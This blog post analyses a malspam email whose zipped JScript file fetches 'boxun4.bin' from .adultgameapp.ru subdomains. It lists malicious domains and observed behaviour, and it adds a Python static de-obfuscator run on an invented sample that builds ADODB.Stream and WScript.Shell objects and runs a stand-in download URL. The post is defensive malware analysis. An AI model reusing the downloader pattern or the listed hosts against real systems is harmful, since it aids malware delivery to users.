Sub-domains at .adultgameapp.ru and proadultgame.ru
I received some malspam on 9/2/16 entitled “Take easy steps on the ladder of happiness”. The email address of the sender was firstname.lastname@example.org and it was supposedly from a “Bettie K. Letbetter”:
Allowing pictures to be displayed in the email shows sexually explicit content. Clicking on the link “Lecherous Bettie” opens up a new tab in the browser and points to sub-domains like bapuortvdedssdtu.datingtf.ru (302), rqfkehjltutiitjk.datingtf.ru and ihwbvyacklkzzkab.datingtf.ru. This was the webpage presented to me:
This looks like some kind of spam page. The interesting portion of this email wasn’t the fake Russian dating website but the attached “IM 77_ .zip” shown above. The criminals are trying to entice users to open the “pics” contained in the .zip for more sexually explicit photos.
Saving the file and opening it up shows that the .zip folder contains the file “Cissy.js”:
Executing the JScript file causes the host to make a single GET request for “/js/boxun4.bin” via sub-domains on .adultgameapp.ru:
Each GET request shown above represents one of my attempts to get infected by executing the JScript file again. Unfortunately, all I was getting back from the server was the 304 (Not Modified) status code.
Each time the JScript file was executed there was a corresponding file created in %APPDATA%:
Looking at Task Manager we can also see the process “TempradFF69C.tmp *32” attempting to run something called “SilverCare”:
However, the program kept getting the error “SilverCare has stopped working,” thus we can also see “WerFault.exe *32” (Windows Problem Reporting) in the Task Manager:
Now for a look at the JScript file responsible for the GET requests for boxun4.bin.
My coworker quickly identified that the randomly named variables in the code are each assigned a specific string fragment. See all the strings highlighted in red:
These fragments are referenced later and concatenated with the “+” operator to rebuild the real strings. Example shown below:
This portion of the code was also fully de-obfuscated by my coworker but won’t be posted on this blog for security reasons:
After fully examining the JScript file we can see that it is constructing an ADODB.Stream and a WScript.Shell object to create the GET requests to the distribution sites.
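The string-splitting trick described above (fragments assigned to throwaway variable names, then glued back together with “+”) can be undone statically rather than by running the sample. The following Python script is an added illustration written for this post, not the de-obfuscated Cissy.js and not code from the original analysis. The embedded JScript snippet is a constructed sample in the same style: the variable names, fragments and the example.invalid URL are invented, and only the ADODB.Stream and WScript.Shell ProgIDs are taken from the behaviour noted on this page.

```python
import re

# Constructed sample in the style of the obfuscation discussed above.
# NOT the real Cissy.js: every name, fragment and URL here is invented.
SAMPLE_JSCRIPT = r'''
var qkz = "ADO";
var wpl = "DB." + "Str";
var nmc = "eam";
var hrt = "WScr";
var ydo = "ipt.She";
var jqa = "ll";
var pfo = "http://" + "example.invalid" + "/js/" + "boxun4.bin";
var s1 = qkz + wpl + nmc;
var s2 = hrt + ydo + jqa;
var obj1 = new ActiveXObject(s1);
var obj2 = new ActiveXObject(s2);
obj1.Open();
obj2.Run(pfo);
'''

# One 'var name = expression;' statement. Limitation: a ';' inside a string
# literal would cut the expression short; good enough for this style of sample.
ASSIGN_RE = re.compile(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]+);')

# Tokens allowed inside a concatenation expression: "string", 'string',
# identifier, or '+'. Anything else (calls, 'new', numbers) is unresolvable.
EXPR_TOKEN_RE = re.compile(
    r'''\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|([A-Za-z_$][\w$]*)|(\+))''')

_ESC = {'n': '\n', 't': '\t', 'r': '\r', '"': '"', "'": "'", '\\': '\\'}


def unescape(s):
    """Undo the common JScript backslash escapes inside a string literal."""
    return re.sub(r'\\(.)', lambda m: _ESC.get(m.group(1), m.group(1)), s)


def resolve_expr(expr, env):
    """Evaluate a '+'-concatenation of string literals and already-resolved
    variables. Returns the constant string, or None if any piece is unknown."""
    expr = expr.strip()
    pos, parts, expect_operand = 0, [], True
    while pos < len(expr):
        m = EXPR_TOKEN_RE.match(expr, pos)
        if not m:
            return None
        dq, sq, ident, plus = m.groups()
        if plus is not None:
            if expect_operand:          # '+' where a value was expected
                return None
            expect_operand = True
        else:
            if not expect_operand:      # two operands with no '+' between
                return None
            if ident is not None:
                if ident not in env:    # unknown name, e.g. 'new' or a call
                    return None
                parts.append(env[ident])
            else:
                parts.append(unescape(dq if dq is not None else sq))
            expect_operand = False
        pos = m.end()
    if expect_operand:                  # empty expression or trailing '+'
        return None
    return ''.join(parts)


def resolve_strings(script):
    """Walk the 'var' assignments in source order, folding each one that is a
    pure string concatenation into a constant. Returns {name: value}."""
    env = {}
    for name, expr in ASSIGN_RE.findall(script):
        value = resolve_expr(expr, env)
        if value is not None:
            env[name] = value
    return env


# ProgIDs observed in the sample's behaviour (see the analysis above).
SUSPICIOUS = ('ADODB.Stream', 'WScript.Shell')


def find_indicators(env):
    """Return (variable, value, marker) triples for resolved strings that name
    a COM object used by script downloaders, or that look like a URL."""
    hits = []
    for name, value in env.items():
        for marker in SUSPICIOUS:
            if marker.lower() in value.lower():
                hits.append((name, value, marker))
        if re.match(r'https?://', value, re.IGNORECASE):
            hits.append((name, value, 'URL'))
    return hits


if __name__ == '__main__':
    resolved = resolve_strings(SAMPLE_JSCRIPT)
    for var, value, marker in find_indicators(resolved):
        print(f'{marker:14} {var} = {value!r}')
```

Because the folding is purely static, nothing from the sample is executed, which is the point when the payload host is still answering. Strings built through function calls or arithmetic (for example String.fromCharCode sequences) come back as unresolved and are left out of the environment, so an empty result means the sample uses a different obfuscation layer, not that it is clean.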
Searching via Google for the file “boxun4.bin” returns tons of Hybrid-Analysis and Malwr’s reports for similarly named .zip files and JScript files. The threat names don’t really give me any clues as to the identity of the malware.
If anybody has any clues as to what this malware is you can contact me on Twitter: @Oddly_Normal